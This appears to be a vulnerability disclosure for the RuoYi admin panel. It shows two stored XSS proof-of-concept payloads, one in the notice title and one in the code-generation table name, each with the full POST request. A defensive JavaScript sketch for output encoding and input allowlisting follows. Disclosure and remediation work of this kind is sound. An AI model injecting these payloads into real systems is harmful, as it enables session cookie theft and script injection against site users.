After the administrator logs in, open the following page:
System management -> Notice notice
Then add the following XSS statement to the announcement title:
poc: ”><sCript>alert`xss`</SCript>
The POST request:
POST /system/notice/edit HTTP/1.1
Host: localhost
Content-Length: 219
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/system/notice/edit/10
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close

noticeId=10&noticeTitle=%E2%80%9D%3E%3CsCript%3Ealert%60xss%60%3C%2FSCript%3E&noticeType=1&noticeContent=%3Cp%3E%E2%80%9D%26gt%3B%26lt%3BsCript%26gt%3Balert%60xss%60%26lt%3B%2FSCript%26gt%3B%3Cbr%3E%3C%2Fp%3E&status=0&=

After the administrator logs in, open the following page:
System tools -> code generation
Then click Import, select any one and click OK. Then click Edit, click basic information, and enter the following XSS statement in the table name column:
poc2:
')" onmousemove=alert(document.cookie) a=(1
The POST request:
POST /tool/gen/edit HTTP/1.1
Host: localhost
Content-Length: 3880
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/tool/gen/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close

tableId=1&tableName=')%22+onmousemove%3Dalert(document.cookie)+a%3D(1&tableComment=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A%E8%A1%A8&className=SysNotice&functionAuthor=ruoyi&remark=&columns%5B0%5D.columnId=1&columns%5B0%5D.sort=1&columns%5B0%5D.columnComment=%E5%85%AC%E5%91%8AID&columns%5B0%5D.javaType=Integer&columns%5B0%5D.javaField=noticeId&columns%5B0%5D.isInsert=1&columns%5B0%5D.queryType=EQ&columns%5B0%5D.htmlType=input&columns%5B0%5D.dictType=&columns%5B1%5D.columnId=2&columns%5B1%5D.sort=2&columns%5B1%5D.columnComment=%E5%85%AC%E5%91%8A%E6%A0%87%E9%A2%98&columns%5B1%5D.javaType=String&columns%5B1%5D.javaField=noticeTitle&columns%5B1%5D.isInsert=1&columns%5B1%5D.isEdit=1&columns%5B1%5D.isList=1&columns%5B1%5D.isQuery=1&columns%5B1%5D.queryType=EQ&columns%5B1%5D.isRequired=1&columns%5B1%5D.htmlType=input&columns%5B1%5D.dictType=&columns%5B2%5D.columnId=3&columns%5B2%5D.sort=3&columns%5B2%5D.columnComment=%E5%85%AC%E5%91%8A%E7%B1%BB%E5%9E%8B%EF%BC%881%E9%80%9A%E7%9F%A5+2%E5%85%AC%E5%91%8A%EF%BC%89&columns%5B2%5D.javaType=String&columns%5B2%5D.javaField=noticeType&columns%5B2%5D.isInsert=1&columns%5B2%5D.isEdit=1&columns%5B2%5D.isList=1&columns%5B2%5D.isQuery=1&columns%5B2%5D.queryType=EQ&columns%5B2%5D.isRequired=1&columns%5B2%5D.htmlType=select&columns%5B2%5D.dictType=&columns%5B3%5D.columnId=4&columns%5B3%5D.sort=4&columns%5B3%5D.columnComment=%E5%85%AC%E5%91%8A%E5%86%85%E5%AE%B9&columns%5B3%5D.javaType=String&columns%5B3%5D.javaField=noticeContent&columns%5B3%5D.isInsert=1&columns%5B3%5D.isEdit=1&columns%5B3%5D.isList=1&columns%5B3%5D.isQuery=1&columns%5B3%5D.queryType=EQ&columns%5B3%5D.htmlType=summernote&columns%5B3%5D.dictType=&columns%5B4%5D.columnId=5&columns%5B4%5D.sort=5&columns%5B4%5D.columnComment=%E5%85%AC%E5%91%8A%E7%8A%B6%E6%80%81%EF%BC%880%E6%AD%A3%E5%B8%B8+1%E5%85%B3%E9%97%AD%EF%BC%89&columns%5B4%5D.javaType=String&columns%5B4%5D.javaField=status&columns%5B4%5D.isInsert=1&columns%5B4%5D.isEdit=1&columns%5B4%5D.isList=1&columns%5B4%5D.isQuery=1&columns%5B4%5D.queryType=EQ&columns%5B4%5D.htmlType=radio&columns%5B4%5D.dictType=&columns%5B5%5D.columnId=6&columns%5B5%5D.sort=6&columns%5B5%5D.columnComment=%E5%88%9B%E5%BB%BA%E8%80%85&columns%5B5%5D.javaType=String&columns%5B5%5D.javaField=createBy&columns%5B5%5D.isInsert=1&columns%5B5%5D.queryType=EQ&columns%5B5%5D.htmlType=input&columns%5B5%5D.dictType=&columns%5B6%5D.columnId=7&columns%5B6%5D.sort=7&columns%5B6%5D.columnComment=%E5%88%9B%E5%BB%BA%E6%97%B6%E9%97%B4&columns%5B6%5D.javaType=Date&columns%5B6%5D.javaField=createTime&columns%5B6%5D.isInsert=1&columns%5B6%5D.queryType=EQ&columns%5B6%5D.htmlType=datetime&columns%5B6%5D.dictType=&columns%5B7%5D.columnId=8&columns%5B7%5D.sort=8&columns%5B7%5D.columnComment=%E6%9B%B4%E6%96%B0%E8%80%85&columns%5B7%5D.javaType=String&columns%5B7%5D.javaField=updateBy&columns%5B7%5D.isInsert=1&columns%5B7%5D.isEdit=1&columns%5B7%5D.queryType=EQ&columns%5B7%5D.htmlType=input&columns%5B7%5D.dictType=&columns%5B8%5D.columnId=9&columns%5B8%5D.sort=9&columns%5B8%5D.columnComment=%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4&columns%5B8%5D.javaType=Date&columns%5B8%5D.javaField=updateTime&columns%5B8%5D.isInsert=1&columns%5B8%5D.isEdit=1&columns%5B8%5D.queryType=EQ&columns%5B8%5D.htmlType=datetime&columns%5B8%5D.dictType=&columns%5B9%5D.columnId=10&columns%5B9%5D.sort=10&columns%5B9%5D.columnComment=%E5%A4%87%E6%B3%A8&columns%5B9%5D.javaType=String&columns%5B9%5D.javaField=remark&columns%5B9%5D.isInsert=1&columns%5B9%5D.isEdit=1&columns%5B9%5D.isList=1&columns%5B9%5D.queryType=EQ&columns%5B9%5D.htmlType=input&columns%5B9%5D.dictType=&tplCategory=crud&packageName=com.ruoyi.system&moduleName=system&businessName=notice&functionName=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A&params%5BparentMenuId%5D=&params%5BparentMenuName%5D=&genType=0&genPath=%2F&subTableName=&params%5BtreeCode%5D=&params%5BtreeParentCode%5D=&params%5BtreeName%5D=
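
A defender-side sketch of how the two fields in the requests above could be handled, added here as an example and not taken from the RuoYi code base: the announcement title is stored as submitted and HTML-encoded at output, and the table name is accepted only if it is a plain identifier. The function names, the identifier rule and the shortened request bodies are assumptions constructed from the values in this report.

```javascript
// Constructed sample bodies: shortened copies of the two POST bodies in the report.
const NOTICE_BODY =
  'noticeId=10&noticeTitle=%E2%80%9D%3E%3CsCript%3Ealert%60xss%60%3C%2FSCript%3E&noticeType=1&status=0';
const GEN_BODY =
  "tableId=1&tableName=')%22+onmousemove%3Dalert(document.cookie)+a%3D(1&className=SysNotice";

// Characters that can end an element's text or a quoted attribute value.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;',
};

// Encode a value for HTML text or a quoted attribute value (output encoding).
function escapeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Assumed rule: a table name is an SQL identifier, so allowlist its alphabet.
const TABLE_NAME_RE = /^[A-Za-z_][A-Za-z0-9_]{0,63}$/;

// Decode an application/x-www-form-urlencoded body into a plain object.
function parseForm(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Hypothetical handler for /system/notice/edit: keep the raw title, encode on render.
function handleNoticeEdit(body) {
  const { noticeTitle = '' } = parseForm(body);
  return {
    stored: noticeTitle,
    rendered: `<input name="noticeTitle" value="${escapeHtml(noticeTitle)}">`,
  };
}

// Hypothetical handler for /tool/gen/edit: reject anything that is not an identifier.
function handleGenEdit(body) {
  const { tableName = '' } = parseForm(body);
  if (!TABLE_NAME_RE.test(tableName)) {
    return { ok: false, error: 'tableName must be a plain identifier' };
  }
  return { ok: true, tableName };
}

console.log(handleNoticeEdit(NOTICE_BODY).rendered);
console.log(handleGenEdit(GEN_BODY));
```

`escapeHtml` covers element text and quoted attribute values only; a value placed inside an inline event-handler string is HTML-decoded before the script runs, so it also needs JavaScript string encoding or, better, should be passed through a data attribute.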